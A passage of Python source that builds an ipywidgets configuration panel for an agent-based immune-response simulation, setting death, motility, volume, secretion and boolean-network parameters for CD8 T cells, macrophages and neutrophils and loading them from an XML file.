chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool11 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate4 = Text(value='chemokine', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate4]
box103 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction4 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction4]
box104 = Box(children=row, layout=box_layout)
# -------------------------
div_row19 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row19.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float90 = FloatText(value='478', step='10', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
time_step = [name_btn, self.float90, units_btn, ]
box105 = Box(children=time_step, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float91 = FloatText(value='47.8', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
time_step = [name_btn, self.float91, units_btn, ]
box106 = Box(children=time_step, layout=box_layout)
# -------------------------
div_row20 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row20.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.text7 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text7]
box107 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float92 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float92, units_btn]
box108 = Box(children=row, layout=box_layout)
# -------------------------
div_row21 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row21.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'tan'
self.bnd_filenames[3] = Text(value='../data/boolean_network/cd8t_cell.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[3]]
box109 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'lightgreen'
self.cfg_filenames[3] = Text(value='../data/boolean_network/cd8t_cell.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[3]]
box110 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'tan'
self.float93 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [time_step, self.float93, units_btn]
box111 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row22 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row22.style.button_color = 'cyan'
name_btn = Button(description='cell_attachment_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float94 = FloatText(value='0.2', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float94, units_btn, description_btn]
box112 = Box(children=row, layout=box_layout)
name_btn = Button(description='cell_attachment_lifetime', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float95 = FloatText(value='8.5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float95, units_btn, description_btn]
box113 = Box(children=row, layout=box_layout)
self.cell_def_vbox3 = VBox([
div_row17, death_model1,box101, div_row18, box102,self.bool9,self.bool10,chemotaxis_btn,self.bool11,box103,box104,div_row19, box105, box106, div_row20, box107,box108,div_row21, box109,box110,box111,div_row22, box112,
box113,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox3)
# >>>>>>>>>>>>>>>>> <cell_definition> = macrophage
# -------------------------
div_row23 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row23.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float96 = FloatText(value='2.1e-4', step='1e-05', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float96, units_btn, ]
box114 = Box(children=row, layout=box_layout)
# -------------------------
div_row24 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row24.style.button_color = 'orange'
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float97 = FloatText(value='0.7', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float97, units_btn]
box115 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float98 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float98, units_btn]
box116 = Box(children=row, layout=box_layout)
self.bool12 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool13 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool14 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_substrate5 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate5]
box117 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_direction5 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction5]
box118 = Box(children=row, layout=box_layout)
# -------------------------
div_row25 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row25.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float99 = FloatText(value='4849', step='100', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float99, units_btn, ]
box119 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float100 = FloatText(value='485', step='10', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float100, units_btn, ]
box120 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float101 = FloatText(value='0.01', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float101, units_btn, ]
box121 = Box(children=row, layout=box_layout)
# -------------------------
div_row26 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row26.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'lightgreen'
self.bnd_filenames[4] = Text(value='../data/boolean_network/macrophage.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[4]]
box122 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'tan'
self.cfg_filenames[4] = Text(value='../data/boolean_network/macrophage.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[4]]
box123 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'lightgreen'
self.float102 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [time_step, self.float102, units_btn]
box124 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row27 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row27.style.button_color = 'cyan'
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float103 = FloatText(value='0.167', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float103, units_btn, description_btn]
box125 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float104 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float104, units_btn, description_btn]
box126 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float105 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float105, units_btn, description_btn]
box127 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float106 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float106, units_btn, description_btn]
box128 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float107 = FloatText(value='1', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='rate of secreting pro-inflamatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float107, units_btn, description_btn]
box129 = Box(children=row, layout=box_layout)
self.cell_def_vbox4 = VBox([
div_row23, death_model1,box114, div_row24, box115,box116,self.bool12,self.bool13,chemotaxis_btn,self.bool14,box117,box118,div_row25, box119, box120, box121, div_row26, box122,box123,box124,div_row27, box125,
box126,
box127,
box128,
box129,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox4)
# >>>>>>>>>>>>>>>>> <cell_definition> = neutrophil
# -------------------------
div_row28 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row28.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float108 = FloatText(value='8.9e-4', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float108, units_btn, ]
box130 = Box(children=row, layout=box_layout)
# -------------------------
div_row29 = Button(description='phenotype:motility', disabled=True, layout=divider_button_layout)
div_row29.style.button_color = 'orange'
name_btn = Button(description='speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float109 = FloatText(value='19', step='1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float109, units_btn]
box131 = Box(children=row, layout=box_layout)
name_btn = Button(description='migration_bias', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float110 = FloatText(value='0.91', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float110, units_btn]
box132 = Box(children=row, layout=box_layout)
name_btn = Button(description='persistence_time', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float111 = FloatText(value='5', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float111, units_btn]
box133 = Box(children=row, layout=box_layout)
self.bool15 = Checkbox(description='enabled', value=True,layout=name_button_layout)
self.bool16 = Checkbox(description='use_2D', value=True,layout=name_button_layout)
chemotaxis_btn = Button(description='chemotaxis', disabled=True, layout={'width':'30%'})
chemotaxis_btn.style.button_color = '#ffde6b'
self.bool17 = Checkbox(description='enabled', value=False,layout=name_button_layout)
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.chemotaxis_substrate6 = Text(value='debris', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_substrate6]
box134 = Box(children=row, layout=box_layout)
name_btn = Button(description='direction', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.chemotaxis_direction6 = Text(value='1', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.chemotaxis_direction6]
box135 = Box(children=row, layout=box_layout)
# -------------------------
div_row30 = Button(description='phenotype:secretion', disabled=True, layout=divider_button_layout)
div_row30.style.button_color = 'orange'
name_btn = Button(description='substrate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.text8 = Text(value='virion', disabled=False, style=style, layout=widget_layout_long)
row = [name_btn, self.text8]
box136 = Box(children=row, layout=box_layout)
name_btn = Button(description='uptake_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float112 = FloatText(value='0.1', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float112, units_btn]
box137 = Box(children=row, layout=box_layout)
# -------------------------
div_row31 = Button(description='phenotype:volume', disabled=True, layout=divider_button_layout)
div_row31.style.button_color = 'orange'
name_btn = Button(description='total', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float113 = FloatText(value='1437', step='100', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float113, units_btn, ]
box138 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float114 = FloatText(value='143.7', step='10', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float114, units_btn, ]
box139 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float115 = FloatText(value='0.045', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float115, units_btn, ]
box140 = Box(children=row, layout=box_layout)
# -------------------------
div_row32 = Button(description='phenotype:intracellular (maboss)', disabled=True, layout=divider_button_layout)
div_row32.style.button_color = 'orange'
bnd_filename = Button(description='bnd_filename', disabled=True, layout=name_button_layout)
bnd_filename.style.button_color = 'tan'
self.bnd_filenames[5] = Text(value='../data/boolean_network/neutrophil.bnd', style=style, layout=widget_layout)
row = [bnd_filename, self.bnd_filenames[5]]
box141 = Box(children=row, layout=box_layout)
cfg_filename = Button(description='cfg_filename', disabled=True, layout=name_button_layout)
cfg_filename.style.button_color = 'lightgreen'
self.cfg_filenames[5] = Text(value='../data/boolean_network/neutrophil.cfg', style=style, layout=widget_layout)
row = [cfg_filename, self.cfg_filenames[5]]
box142 = Box(children=row, layout=box_layout)
time_step = Button(description='time_step', disabled=True, layout=name_button_layout)
time_step.style.button_color = 'tan'
self.float116 = FloatText(value='12', style=style, layout=widget_layout)
units_btn = Button(description='min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [time_step, self.float116, units_btn]
box143 = Box(children=row, layout=box_layout)
# ================== <custom_data>, if present ==================
div_row33 = Button(description='Custom Data',disabled=True, layout=divider_button_layout)
div_row33.style.button_color = 'cyan'
name_btn = Button(description='phagocytosis_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float117 = FloatText(value='0.117', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float117, units_btn, description_btn]
box144 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_debris_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float118 = FloatText(value='1.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='relative sensitivity to debris in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float118, units_btn, description_btn]
box145 = Box(children=row, layout=box_layout)
name_btn = Button(description='sensitivity_to_chemokine_chemotaxis', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float119 = FloatText(value='10.0', step='1', style=style, layout=widget_layout)
units_btn = Button(description='dimensionless', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='relative sensitivity to chemokine in chemotaxis', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float119, units_btn, description_btn]
box146 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_speed', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float120 = FloatText(value='0.4', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='micron/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
description_btn = Button(description='speed after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'tan'
row = [name_btn, self.float120, units_btn, description_btn]
box147 = Box(children=row, layout=box_layout)
name_btn = Button(description='activated_cytokine_secretion_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float121 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
description_btn = Button(description='rate of secreting pro-inflamatory cytokine after activation', disabled=True, layout=desc_button_layout)
description_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float121, units_btn, description_btn]
box148 = Box(children=row, layout=box_layout)
self.cell_def_vbox5 = VBox([
div_row28, death_model1,box130, div_row29, box131,box132,box133,self.bool15,self.bool16,chemotaxis_btn,self.bool17,box134,box135,div_row30, box136,box137,div_row31, box138, box139, box140, div_row32, box141,box142,box143,div_row33, box144,
box145,
box146,
box147,
box148,
])
# ------------------------------------------
self.cell_def_vboxes.append(self.cell_def_vbox5)
row = [name_btn, self.float121, units_btn, description_btn]
box143 = Box(children=row, layout=box_layout)
self.tab = VBox([
self.cell_type_parent_row, explain_inheritance,
self.cell_def_vbox0, self.cell_def_vbox1, self.cell_def_vbox2, self.cell_def_vbox3, self.cell_def_vbox4, self.cell_def_vbox5, ])
self.display_cell_type_default()
#------------------------------
def cell_type_cb(self, change):
if change['type'] == 'change' and change['name'] == 'value':
# print("changed to %s" % change['new'])
self.parent_name.value = self.cell_type_parent_dict[change['new']]
idx_selected = list(self.cell_type_parent_dict.keys()).index(change['new'])
# print('index=',idx_selected)
# self.vbox1.layout.visibility = 'hidden' # vs. visible
# self.vbox1.layout.visibility = None
# There's probably a better way to do this, but for now,
# we hide all vboxes containing the widgets for the different cell defs
# and only display the contents of the selected one.
for vb in self.cell_def_vboxes:
vb.layout.display = 'none' # vs. 'contents'
self.cell_def_vboxes[idx_selected].layout.display = 'contents' # vs. 'contents'
#------------------------------
def display_cell_type_default(self):
# print("display_cell_type_default():")
#print(" self.cell_type_parent_dict = ",self.cell_type_parent_dict)
# There's probably a better way to do this, but for now,
# we hide all vboxes containing the widgets for the different cell defs
# and only display the contents of 'default'
for vb in self.cell_def_vboxes:
vb.layout.display = 'none' # vs. 'contents'
self.cell_def_vboxes[0].layout.display = 'contents'
# Populate the GUI widgets with values from the XML
def fill_gui(self, xml_root):
uep = xml_root.find('.//cell_definitions') # find unique entry point
# ------------------ cell_definition: default
# --------- cycle (flow_cytometry_separated_cycle_model)
self.float0.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[1]').text)
self.float1.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[2]').text)
self.float2.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[3]').text)
self.float3.value = float(uep.find('.//cell_definition[1]//phenotype//cycle//phase_transition_rates//rate[4]').text)
# --------- death
self.float4.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//death_rate').text)
self.float5.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//unlysed_fluid_change_rate').text)
self.float6.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//lysed_fluid_change_rate').text)
self.float7.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//cytoplasmic_biomass_change_rate').text)
self.float8.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//nuclear_biomass_change_rate').text)
self.float9.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//calcification_rate').text)
self.float10.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[1]//parameters//relative_rupture_volume').text)
self.float11.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//death_rate').text)
self.float12.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//unlysed_fluid_change_rate').text)
self.float13.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//lysed_fluid_change_rate').text)
self.float14.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//cytoplasmic_biomass_change_rate').text)
self.float15.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//nuclear_biomass_change_rate').text)
self.float16.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//calcification_rate').text)
self.float17.value = float(uep.find('.//cell_definition[1]//phenotype//death//model[2]//parameters//relative_rupture_volume').text)
# --------- volume
self.float18.value = float(uep.find('.//cell_definition[1]//phenotype//volume//total').text)
self.float19.value = float(uep.find('.//cell_definition[1]//phenotype//volume//fluid_fraction').text)
self.float20.value = float(uep.find('.//cell_definition[1]//phenotype//volume//nuclear').text)
self.float21.value = float(uep.find('.//cell_definition[1]//phenotype//volume//fluid_change_rate').text)
self.float22.value = float(uep.find('.//cell_definition[1]//phenotype//volume//cytoplasmic_biomass_change_rate').text)
self.float23.value = float(uep.find('.//cell_definition[1]//phenotype//volume//nuclear_biomass_change_rate').text)
self.float24.value = float(uep.find('.//cell_definition[1]//phenotype//volume//calcified_fraction').text)
self.float25.value = float(uep.find('.//cell_definition[1]//phenotype//volume//calcification_rate').text)
self.float26.value = float(uep.find('.//cell_definition[1]//phenotype//volume//relative_rupture_volume').text)
# --------- mechanics
self.float27.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_adhesion_strength').text)
self.float28.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//cell_cell_repulsion_strength').text)
self.float29.value = float(uep.find('.//cell_definition[1]//phenotype//mechanics//relative_maximum_adhesion_distance').text)
self.bool0.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_relative_equilibrium_distance').attrib['enabled'].lower()))
self.bool1.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//mechanics//options//set_absolute_equilibrium_distance').attrib['enabled'].lower()))
# --------- motility
self.float32.value = float(uep.find('.//cell_definition[1]//phenotype//motility//speed').text)
self.float33.value = float(uep.find('.//cell_definition[1]//phenotype//motility//persistence_time').text)
self.float34.value = float(uep.find('.//cell_definition[1]//phenotype//motility//migration_bias').text)
self.bool2.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//enabled').text.lower()))
self.bool3.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//use_2D').text.lower()))
self.bool4.value = ('true' == (uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate1.value = uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction1.value = uep.find('.//cell_definition[1]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text0.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]').attrib['name']
self.float35.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[1]//secretion_target').text)
self.text1.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]').attrib['name']
self.float36.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[2]//secretion_target').text)
self.text2.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]').attrib['name']
self.float37.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[3]//secretion_target').text)
self.text3.value = uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]').attrib['name']
self.float38.value = float(uep.find('.//cell_definition[1]//phenotype//secretion//substrate[4]//secretion_target').text)
# --------- molecular
# ------------------ cell_definition: lung epithelium
# --------- death
self.float77.value = float(uep.find('.//cell_definition[2]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.bool5.value = ('true' == (uep.find('.//cell_definition[2]//phenotype//motility//options//enabled').text.lower()))
# --------- secretion
# --------- intracellular
self.bnd_filenames[1].value = uep.find('.//cell_definition[2]//phenotype//intracellular//bnd_filename').text
self.cfg_filenames[1].value = uep.find('.//cell_definition[2]//phenotype//intracellular//cfg_filename').text
self.float78.value = float(uep.find('.//cell_definition[2]//phenotype//intracellular//time_step').text)
# ------------------ cell_definition: immune
# --------- mechanics
self.float79.value = float(uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_adhesion_strength').text)
self.float80.value = float(uep.find('.//cell_definition[3]//phenotype//mechanics//cell_cell_repulsion_strength').text)
# --------- death
self.float81.value = float(uep.find('.//cell_definition[3]//phenotype//death//model[1]//death_rate').text)
# --------- motility
self.float82.value = float(uep.find('.//cell_definition[3]//phenotype//motility//speed').text)
self.float83.value = float(uep.find('.//cell_definition[3]//phenotype//motility//persistence_time').text)
self.float84.value = float(uep.find('.//cell_definition[3]//phenotype//motility//migration_bias').text)
self.bool6.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//enabled').text.lower()))
self.bool7.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//use_2D').text.lower()))
self.bool8.value = ('true' == (uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//enabled').text.lower()))
self.chemotaxis_substrate3.value = uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//substrate').text
self.chemotaxis_direction3.value = uep.find('.//cell_definition[3]//phenotype//motility//options//chemotaxis//direction').text
# --------- secretion
self.text4.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]').attrib['name']
self.float85.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[1]//uptake_rate').text)
self.text5.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]').attrib['name']
self.float86.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[2]//uptake_rate').text)
self.text6.value = uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]').attrib['name']
self.float87.value = float(uep.find('.//cell_definition[3]//phenotype//secretion//substrate[3]//uptake_rate').text)
# ------------------ cell_definition: CD8 Tcell
# --------- death
self.float88.value = float(uep.find('.//cell_definition[4]//phenotype//death//model[1]//death_rate').text)
# --------- motility
